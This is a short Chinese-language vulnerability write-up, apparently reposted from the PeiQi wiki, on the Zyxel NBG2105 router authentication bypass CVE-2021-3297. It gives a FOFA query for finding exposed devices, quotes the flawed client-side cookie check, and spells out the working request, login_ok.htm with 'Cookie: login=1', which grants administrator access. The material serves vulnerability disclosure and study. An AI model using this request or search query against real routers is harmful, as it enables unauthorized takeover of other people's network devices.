一:漏洞描述🐑
Zyxel NBG2105 存在身份验证绕过,攻击者通过更改 login参数可用实现后台登陆
二: 漏洞影响🐇
Zyxel NBG2105
三: 漏洞复现🐋
FOFA: app="ZyXEL-NBG2105"
登录页面如下
其中前端文件 /js/util_gw.js 存在前端对 Cookie login参数的校验
可以看到检测到 Cookie中的 login=1 则跳转 home.html
function setCookie() //login_ok.htm use
{
document.cookie="login=1";
MM_goToURL('parent', 'home.htm');
}
请求如下则会以管理员身份跳转到 home.htm页面
http://xxx.xxx.xxx.xxx/login_ok.htm
Cookie: login=1;
四: 参考文章🦉
https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass
五: 关于文库🦉
在线文库:
http://wiki.peiqi.tech
Github:
https://github.com/PeiQi0/PeiQi-WIKI-POC
最后
下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号
想要加入交流群的师傅公众号点击交流群加我拉你啦~
别忘了Github下载完给个小星星⭐
同时知识星球也开放运营啦,希望师傅们支持支持啦🐟
知识星球里会持续发布一些漏洞公开信息和技术文章~
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
PeiQi文库 拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
本文始发于微信公众号(PeiQi文库):Zyxel NBG2105 身份验证绕过 CVE-2021-3297
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论